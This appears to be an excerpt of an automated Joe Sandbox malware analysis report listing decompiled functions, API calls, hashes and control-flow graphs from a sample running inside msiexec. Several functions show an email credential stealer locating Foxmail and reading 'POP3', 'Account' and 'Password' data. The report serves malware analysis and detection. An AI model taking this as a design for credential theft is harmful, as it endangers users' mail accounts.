                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                    • String ID:
                                                                    • API String ID: 1083526818-0
                                                                    • Opcode ID: d92012f640373d80fb8c0db6523236a1c779b7b821fa95cbc49f3cb78194e1eb
                                                                    • Instruction ID: 501e382b25e4a28cfc5745c1cb17abbf772c4edbe8e37a5c6130506151c41fae
                                                                    • Opcode Fuzzy Hash: d92012f640373d80fb8c0db6523236a1c779b7b821fa95cbc49f3cb78194e1eb
                                                                    • Instruction Fuzzy Hash: 952193729043486BD724EA749C48F9B7BEDEF84718F0409AAB958D3190EB34D60587AA
                                                                    Function 234B12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 234B1434
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 234B1137
                                                                      • Part of subcall function 234B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1151
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B115C
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B116D
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B117C
                                                                      • Part of subcall function 234B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1193
                                                                      • Part of subcall function 234B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 234B11D0
                                                                      • Part of subcall function 234B10F1: FindClose.KERNEL32(00000000), ref: 234B11DB
                                                                    • lstrlenW.KERNEL32(?), ref: 234B14C5
                                                                    • lstrlenW.KERNEL32(?), ref: 234B14E0
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B150F
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B1521
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B1547
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B1553
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B1579
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B1585
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B15AB
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B15B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                    • API String ID: 672098462-2938083778
                                                                    • Opcode ID: b762f96c1d2b561daffdf747e9363e33b30928cb6fbc6d4ce18d214b16aae365
                                                                    • Instruction ID: 3a5b90fbb72883e8c5464f1f3704d9f7cd7995fa37a592ab80e98af52ffe5e42
                                                                    • Opcode Fuzzy Hash: b762f96c1d2b561daffdf747e9363e33b30928cb6fbc6d4ce18d214b16aae365
                                                                    • Instruction Fuzzy Hash: BC81A175A00358AADB30DBA19C85FDE7379EF84700F0005DAF508E7190EA715A86CFA9

                                                                    Non-executed Functions

                                                                    Function 234B60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 234B61DA
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 234B61E4
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 234B61F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: c960b1c5abeafe61067992dde98395806ff069485f0969203fc3482b68e284b6
                                                                    • Instruction ID: f8a599b2a0afa926255b5d1bfb7f5d25b59c0039739a1e95a3cfa9f0b75aa65a
                                                                    • Opcode Fuzzy Hash: c960b1c5abeafe61067992dde98395806ff069485f0969203fc3482b68e284b6
                                                                    • Instruction Fuzzy Hash: BF31D674D1121C9BCB25DF24D98878DBBB9FF18710F5041DAE81CA7250EB349B818F59
                                                                    Function 234B4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000,?,234B2082,234C2108,0000000C,234B1F3A,?), ref: 234B4AD5
                                                                    • TerminateProcess.KERNEL32(00000000,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000,?,234B2082,234C2108,0000000C,234B1F3A,?), ref: 234B4ADC
                                                                    • ExitProcess.KERNEL32 ref: 234B4AEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: b82db744dc422efc253e54459719f70a37581feb6b9343b315e6b1e944934018
                                                                    • Instruction ID: 0b2f132a41f452d7ba6118f3ec95e80d52faa11eb560299e261636f0e19a59bc
                                                                    • Opcode Fuzzy Hash: b82db744dc422efc253e54459719f70a37581feb6b9343b315e6b1e944934018
                                                                    • Instruction Fuzzy Hash: 6EE04F35900204EFCF057F14CD08A493BBBEF25745B5044D4FA0467221DB39D943CA68
                                                                    Function 234B6580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .
                                                                    • API String ID: 0-248832578
                                                                    • Opcode ID: 7fd91671dbb39c9316938cd3e4193dfdadacde1ed467dad587a550fb4704c848
                                                                    • Instruction ID: db8b6c644eead49c6329e8856f0807f91b09a77602217c4be432b39d6e95998e
                                                                    • Opcode Fuzzy Hash: 7fd91671dbb39c9316938cd3e4193dfdadacde1ed467dad587a550fb4704c848
                                                                    • Instruction Fuzzy Hash: 1F312672D00209AFCB149E78CC84EEA7BBFDB85304F0401ECE919D7251E6399A458B74
                                                                    Function 234B724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 7422ebf68d6e1d93fdf97a99af4cef7845df4c2114651da192e8a348ecb7fa51
                                                                    • Instruction ID: 72d32a4285639ea6288b2e6869013d2c2106cf4b954e61d552dd53c9cd0f1e69
                                                                    • Opcode Fuzzy Hash: 7422ebf68d6e1d93fdf97a99af4cef7845df4c2114651da192e8a348ecb7fa51
                                                                    • Instruction Fuzzy Hash: 0DA01130A002038F8308AE30820A20C3AEEAA2228C30088EAA808E0000FF2CC0008A08
                                                                    Function 234B173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 234B1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D1B
                                                                      • Part of subcall function 234B1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 234B1D37
                                                                      • Part of subcall function 234B1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D4B
                                                                    • _strlen.LIBCMT ref: 234B1855
                                                                    • _strlen.LIBCMT ref: 234B1869
                                                                    • _strlen.LIBCMT ref: 234B188B
                                                                    • _strlen.LIBCMT ref: 234B18AE
                                                                    • _strlen.LIBCMT ref: 234B18C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                    • API String ID: 3296212668-3023110444
                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction ID: c027857f9ee2de645b0aa92502889d8c02137e55bb97af2cce669aad26c96e1e
                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction Fuzzy Hash: AE61F171D00358AEEF219BA8C880BDEB7BBAF15640F4440DAD605A7350EB745A47CF6E
                                                                    Function 234B19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                    • API String ID: 4218353326-230879103
                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction ID: 1d0150790143240434a60cd33f28e81cb1084e8c22b393397632b7574e5a263c
                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction Fuzzy Hash: D2711571D002285FDF21ABB49C84ADF7BFE9F19600F5440DADA44E7241E6749786CBB8
                                                                    Function 234B7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 203 234b7cc2-234b7cd6 204 234b7cd8-234b7cdd 203->204 205 234b7d44-234b7d4c 203->205 204->205 206 234b7cdf-234b7ce4 204->206 207 234b7d4e-234b7d51 205->207 208 234b7d93-234b7dab call 234b7e35 205->208 206->205 209 234b7ce6-234b7ce9 206->209 207->208 211 234b7d53-234b7d90 call 234b571e * 4 207->211 217 234b7dae-234b7db5 208->217 209->205 212 234b7ceb-234b7cf3 209->212 211->208 215 234b7d0d-234b7d15 212->215 216 234b7cf5-234b7cf8 212->216 222 234b7d2f-234b7d43 call 234b571e * 2 215->222 223 234b7d17-234b7d1a 215->223 216->215 219 234b7cfa-234b7d0c call 234b571e call 234b90ba 216->219 220 234b7db7-234b7dbb 217->220 221 234b7dd4-234b7dd8 217->221 219->215 229 234b7dbd-234b7dc0 220->229 230 234b7dd1 220->230 225 234b7dda-234b7ddf 221->225 226 234b7df0-234b7dfc 221->226 222->205 223->222 231 234b7d1c-234b7d2e call 234b571e call 234b91b8 223->231 233 234b7ded 225->233 234 234b7de1-234b7de4 225->234 226->217 236 234b7dfe-234b7e0b call 234b571e 226->236 229->230 238 234b7dc2-234b7dd0 call 234b571e * 2 229->238 230->221 231->222 233->226 234->233 243 234b7de6-234b7dec call 234b571e 234->243 238->230 243->233
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 234B7D06
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B90D7
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B90E9
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B90FB
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B910D
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B911F
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9131
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9143
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9155
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9167
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9179
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B918B
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B919D
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B91AF
                                                                    • _free.LIBCMT ref: 234B7CFB
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B7D1D
                                                                    • _free.LIBCMT ref: 234B7D32
                                                                    • _free.LIBCMT ref: 234B7D3D
                                                                    • _free.LIBCMT ref: 234B7D5F
                                                                    • _free.LIBCMT ref: 234B7D72
                                                                    • _free.LIBCMT ref: 234B7D80
                                                                    • _free.LIBCMT ref: 234B7D8B
                                                                    • _free.LIBCMT ref: 234B7DC3
                                                                    • _free.LIBCMT ref: 234B7DCA
                                                                    • _free.LIBCMT ref: 234B7DE7
                                                                    • _free.LIBCMT ref: 234B7DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 782ff1c9af1b1e4cb7325538b9883461fc7a327537b865d39a526bc95ea81f72
                                                                    • Instruction ID: b218de88378cd9a5db3aaa8250f25482c1218f6662bbad1450c5b5389f29a601
                                                                    • Opcode Fuzzy Hash: 782ff1c9af1b1e4cb7325538b9883461fc7a327537b865d39a526bc95ea81f72
                                                                    • Instruction Fuzzy Hash: 05313B31E00304DFEB21AA38D940F66BBFFAF04690F1448DDE949D7251DA31A9909B3C
                                                                    Function 234B59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B59EA
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B59F6
                                                                    • _free.LIBCMT ref: 234B5A01
                                                                    • _free.LIBCMT ref: 234B5A0C
                                                                    • _free.LIBCMT ref: 234B5A17
                                                                    • _free.LIBCMT ref: 234B5A22
                                                                    • _free.LIBCMT ref: 234B5A2D
                                                                    • _free.LIBCMT ref: 234B5A38
                                                                    • _free.LIBCMT ref: 234B5A43
                                                                    • _free.LIBCMT ref: 234B5A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 995f0af09cd69e6b56058c12185304fc54a332b27d6e5be553000fbda202d23a
                                                                    • Instruction ID: cd1936ddd4f911582dfa8622ac5f74d74198b2230eb87dc4babfc37e6af2ce4d
                                                                    • Opcode Fuzzy Hash: 995f0af09cd69e6b56058c12185304fc54a332b27d6e5be553000fbda202d23a
                                                                    • Instruction Fuzzy Hash: 1511897AA10248FFCB21EF54C841CDDBFB6EF18650F5541E9B9088F225DA31DA609BA4
                                                                    Function 234BAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 287 234baa53-234baa6e 288 234baa80 287->288 289 234baa70-234baa7e RtlDecodePointer 287->289 290 234baa85-234baa8b 288->290 289->290 291 234babb2-234babb5 290->291 292 234baa91 290->292 295 234bac12 291->295 296 234babb7-234babba 291->296 293 234baa97-234baa9a 292->293 294 234baba6 292->294 298 234baaa0 293->298 299 234bab47-234bab4a 293->299 297 234baba8-234babad 294->297 300 234bac19 295->300 301 234babbc-234babbf 296->301 302 234bac06 296->302 303 234bac5b-234bac6a call 234b2ada 297->303 304 234baaa6-234baaab 298->304 305 234bab34-234bab42 298->305 309 234bab9d-234baba4 299->309 310 234bab4c-234bab4f 299->310 306 234bac20-234bac49 300->306 307 234babfa 301->307 308 234babc1-234babc4 301->308 302->295 313 234baaad-234baab0 304->313 314 234bab25-234bab2f 304->314 305->306 335 234bac4b-234bac50 call 234b6368 306->335 336 234bac56-234bac59 306->336 307->302 315 234babee 308->315 316 234babc6-234babc9 308->316 312 234bab61-234bab8f 309->312 317 234bab51-234bab54 310->317 318 234bab94-234bab9b 310->318 312->336 320 234bab1c-234bab23 313->320 321 234baab2-234baab5 313->321 314->306 315->307 323 234babcb-234babd0 316->323 324 234babe2 316->324 317->303 325 234bab5a 317->325 318->300 326 234baac7-234baaf7 320->326 327 234bab0d-234bab17 321->327 328 234baab7-234baaba 321->328 329 234babdb-234babe0 323->329 330 234babd2-234babd5 323->330 324->315 325->312 326->336 341 234baafd-234bab08 call 234b6368 326->341 327->306 328->303 332 234baac0 328->332 329->297 330->303 330->329 332->326 335->336 336->303 341->336
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                    • API String ID: 3527080286-3064271455
                                                                    • Opcode ID: 494515c56e84f023cdb0da3ab4cd90ad6dfe8c33c786fc62abdc2b9d91a07266
                                                                    • Instruction ID: ad595cdddfbdccc715996ddee800fd4c05f7a08285615fdf99d3a40a03bbe475
                                                                    • Opcode Fuzzy Hash: 494515c56e84f023cdb0da3ab4cd90ad6dfe8c33c786fc62abdc2b9d91a07266
                                                                    • Instruction Fuzzy Hash: 7C517C74D04649CBCF00EFA8DA8859CBBB6FB5D210F1445C7D6A1A6354DB398A25CB3C
                                                                    Function 234B1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D1B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 234B1D37
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D4B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D58
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D72
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D7D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 1454806937-0
                                                                    • Opcode ID: 3f65644328512fdb9dc07a0b2fbb57a3ec1b03396bdb8c3c147daa66bdf41edd
                                                                    • Instruction ID: 0b8e24960f7b122243ba5d44827fcd3ba4486d6d4a2ec08e2ad8baf62d08d258
                                                                    • Opcode Fuzzy Hash: 3f65644328512fdb9dc07a0b2fbb57a3ec1b03396bdb8c3c147daa66bdf41edd
                                                                    • Instruction Fuzzy Hash: 7A212F71D4121CAFDB14AFA48C8CEEB76FDEB29358F0409E6F511E2140EA749E468A74
                                                                    Function 234B9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 361 234b9492-234b94ef GetConsoleCP 362 234b9632-234b9644 call 234b2ada 361->362 363 234b94f5-234b9511 361->363 365 234b952c-234b953d call 234b7c19 363->365 366 234b9513-234b952a 363->366 372 234b953f-234b9542 365->372 373 234b9563-234b9565 365->373 367 234b9566-234b9575 call 234b79e6 366->367 367->362 377 234b957b-234b959b WideCharToMultiByte 367->377 375 234b9609-234b9628 372->375 376 234b9548-234b955a call 234b79e6 372->376 373->367 375->362 376->362 383 234b9560-234b9561 376->383 377->362 379 234b95a1-234b95b7 WriteFile 377->379 381 234b962a-234b9630 GetLastError 379->381 382 234b95b9-234b95ca 379->382 381->362 382->362 384 234b95cc-234b95d0 382->384 383->377 385 234b95fe-234b9601 384->385 386 234b95d2-234b95f0 WriteFile 384->386 385->363 388 234b9607 385->388 386->381 387 234b95f2-234b95f6 386->387 387->362 389 234b95f8-234b95fb 387->389 388->362 389->385
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,234B9C07,?,00000000,?,00000000,00000000), ref: 234B94D4
                                                                    • __fassign.LIBCMT ref: 234B954F
                                                                    • __fassign.LIBCMT ref: 234B956A
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 234B9590
                                                                    • WriteFile.KERNEL32(?,?,00000000,234B9C07,00000000,?,?,?,?,?,?,?,?,?,234B9C07,?), ref: 234B95AF
                                                                    • WriteFile.KERNEL32(?,?,?,234B9C07,00000000,?,?,?,?,?,?,?,?,?,234B9C07,?), ref: 234B95E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: d46432a19c7b9a53e443a1203b7e559fa6adb189365253872be039119fb70739
                                                                    • Instruction ID: dc195f737faa2a4faa202ef795a6ae13cef3f71c1be6663c4e83238263bc0652
                                                                    • Opcode Fuzzy Hash: d46432a19c7b9a53e443a1203b7e559fa6adb189365253872be039119fb70739
                                                                    • Instruction Fuzzy Hash: 0B51D371D00209AFDB10CFA8C891BEEBBFAEF19300F1445DAE955E7291E7309941CB68
                                                                    Function 234B3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 390 234b3370-234b33b5 call 234b3330 call 234b37a7 395 234b33b7-234b33c9 390->395 396 234b3416-234b3419 390->396 398 234b3439-234b3442 395->398 399 234b33cb 395->399 397 234b341b-234b3428 call 234b3790 396->397 396->398 402 234b342d-234b3436 call 234b3330 397->402 401 234b33d0-234b33e7 399->401 403 234b33e9-234b33f7 call 234b3740 401->403 404 234b33fd 401->404 402->398 411 234b33f9 403->411 412 234b340d-234b3414 403->412 407 234b3400-234b3405 404->407 407->401 410 234b3407-234b3409 407->410 410->398 413 234b340b 410->413 414 234b33fb 411->414 415 234b3443-234b344c 411->415 412->402 413->402 414->407 416 234b344e-234b3455 415->416 417 234b3486-234b3496 call 234b3774 415->417 416->417 419 234b3457-234b3466 call 234bbbe0 416->419 422 234b34aa-234b34c6 call 234b3330 call 234b3758 417->422 423 234b3498-234b34a7 call 234b3790 417->423 427 234b3468-234b3480 419->427 428 234b3483 419->428 423->422 427->428 428->417
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 234B339B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 234B33A3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 234B3431
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 234B345C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 234B34B1
                                                                    Strings
                                                                    Memory Dump Source
